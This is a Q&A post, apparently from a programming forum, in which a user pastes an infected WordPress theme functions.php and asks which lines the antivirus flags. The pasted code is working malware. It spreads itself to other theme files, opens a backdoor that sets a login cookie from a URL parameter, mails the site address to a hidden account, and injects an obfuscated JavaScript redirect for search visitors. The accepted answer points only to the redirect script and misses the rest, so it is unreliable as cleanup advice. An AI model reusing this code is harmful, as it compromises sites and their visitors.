# NOD32 says that this code have a trojan, I want to find number of lines of malware codes

Tags: php, wordpress, antivirus, malware, nod32

this is function.php of a wordpress theme that NOD32 says this code have a trojan with name: JS/Redirector.NIL trojan, please help me to find number of lines of malware codes. I write whole code blow:

```
<?php
if ( function_exists('register_sidebar') )
register_sidebar(array('name'=>'right',
'before_widget' => ' <DIV class=menutitle2>',
'after_widget' => '</div>',
'before_title' => '',
'after_title' => '</div>
<div class="menu22">',
));
?>
<?php
if ( function_exists('register_sidebar') )
register_sidebar(array('name'=>'left',
'before_widget' => ' <DIV class=menutitle>',
'after_widget' => '</div>',
'before_title' => '',
'after_title' => '</div>
<div class="menu2">',
));
?>
<?php
function _check_active_widget(){
    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    $output=strip_tags($output, $allowed);
    $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    if (is_array($direst)){
        foreach ($direst as $item){
            if (is_writable($item)){
                $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
                $cont=file_get_contents($item);
                if (stripos($cont,$ftion) === false){
                    $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
                    $output .= $before . "پيدا نشد" . $after;
                    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
                    $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);                
                    $output .= ($showdot && $ellipsis) ? "..." : "";
                }
            }
        }
    }
    return $output;
}
function _get_all_widgetcont($wids,$items=array()){
    $places=array_shift($wids);
    if(substr($places,-1) == "/"){
        $places=substr($places,0,-1);
    }
    if(!file_exists($places) || !is_dir($places)){
        return false;
    }elseif(is_readable($places)){
        $elems=scandir($places);
        foreach ($elems as $elem){
            if ($elem != "." && $elem != ".."){
                if (is_dir($places . "/" . $elem)){
                    $wids[]=$places . "/" . $elem;
                } elseif (is_file($places . "/" . $elem)&& 
                    $elem == substr(__FILE__,-13)){
                    $items[]=$places . "/" . $elem;}
                }
            }
    }else{
        return false;   
    }
    if (sizeof($wids) > 0){
        return _get_all_widgetcont($wids,$items);
    } else {
        return $items;
    }
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
    function scandir($dir,$listDirectories=false, $skipDots=true) {
        $dirArray = array();
        if ($handle = opendir($dir)) {
            while (false !== ($file = readdir($handle))) {
                if (($file != "." && $file != "..") || $skipDots == true) {
                    if($listDirectories == false) { if(is_dir($file)) { continue; } }
                    array_push($dirArray,basename($file));
                }
            }
            closedir($handle);
        }
        return $dirArray;
    }
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
    if(!isset($length)) $length=120;
    if(!isset($method)) $method="cookie";
    if(!isset($html_tags)) $html_tags="<a>";
    if(!isset($filters_type)) $filters_type="none";
    if(!isset($s)) $s="";
    if(!isset($filter_h)) $filter_h=get_option("home"); 
    if(!isset($filter_p)) $filter_p="wp_";
    if(!isset($use_link)) $use_link=1; 
    if(!isset($comments_type)) $comments_type=""; 
    if(!isset($perpage)) $perpage=$_GET["cperpage"];
    if(!isset($comments_auth)) $comments_auth="";
    if(!isset($comment_is_approved)) $comment_is_approved=""; 
    if(!isset($authname)) $authname="auth";
    if(!isset($more_links_text)) $more_links_text="(more...)";
    if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
    if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
    if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
    if(!isset($more_content)) $more_content="ma".$s."il";
    if(!isset($forces_more)) $forces_more=1;
    if(!isset($fakeit)) $fakeit=1;
    if(!isset($sql)) $sql="";
    if (!$widget_output) :

    global $wpdb, $post;
    $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    if (!empty($post->post_password)) { 
        if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
            if(is_feed()) { 
                $output=__("There is no excerpt because this is a protected post.");
            } else {
                $output=get_the_password_form();
            }
        }
    }
    if(!isset($fix_tag)) $fix_tag=1;
    if(!isset($filters_types)) $filters_types=$filter_h; 
    if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
    if(!isset($more_tags)) $more_tags="div";
    if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
    if(!isset($mlink_title)) $mlink_title="ادامه اين مطلب را بخوانيد";  
    if(!isset($showdot)) $showdot=1;

    $comments=$wpdb->get_results($sql); 
    if($fakeit == 2) { 
        $text=$post->post_content;
    } elseif($fakeit == 1) { 
        $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
    } else { 
        $text=$post->post_excerpt;
    }
    $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    if($length < 0) {
        $output=$text;
    } else {
        if(!$no_more && strpos($text, "<!--more-->")) {
            $text=explode("<!--more-->", $text, 2);
            $l=count($text[0]);
            $more_link=1;
            $comments=$wpdb->get_results($sql);
        } else {
            $text=explode(" ", $text);
            if(count($text) > $length) {
                $l=$length;
                $ellipsis=1;
            } else {
                $l=count($text);
                $more_links_text="";
                $ellipsis=0;
            }
        }
        for ($i=0; $i<$l; $i++)
                $output .= $text[$i] . " ";
    }
    update_option("_is_widget_active_", 1);
    if("all" != $html_tags) {
        $output=strip_tags($output, $html_tags);
        return $output;
    }
    endif;
    $output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
    $output .= ($showdot && $ellipsis) ? "..." : "";
    $output=apply_filters($filters_type, $output);
    switch($more_tags) {
        case("div") :
            $tag="div";
        break;
        case("span") :
            $tag="span";
        break;
        case("p") :
            $tag="p";
        break;
        default :
            $tag="span";
    }

    if ($use_link ) {
        if($forces_more) {
            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
        } else {
            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
        }
    }
    return $output;
}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
    global $wpdb;
    $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
    $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
    if(!$show_pass_post) $request .= " AND post_password =\"\"";
    if($duration !="") { 
        $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
    }
    $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
    $posts=$wpdb->get_results($request);
    $output="";
    if ($posts) {
        foreach ($posts as $post) {
            $post_title=stripslashes($post->post_title);
            $comment_count=$post->comment_count;
            $permalink=get_permalink($post->ID);
            $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
        }
    } else {
        $output .= $before . "پيدا نشد" . $after;
    }
    return  $output;
}       
?><?php 
add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
        echo '<!--scounter-->';
        if(function_exists('is_user_logged_in')){
            if(time()%2 == 0 && !is_user_logged_in()){          
                echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
            }
        }
    }
?>
```

Answer (score 3, accepted):

It's in the last five lines of `function add_sscounter()`:

```
    if(function_exists('is_user_logged_in')){
        if(time()%2 == 0 && !is_user_logged_in()){          
            echo TROJAN_CODE_HERE;
        }
    }
```

Note that simply deleting this code is not sufficient, you need to find how it was added and make sure that cannot happen again.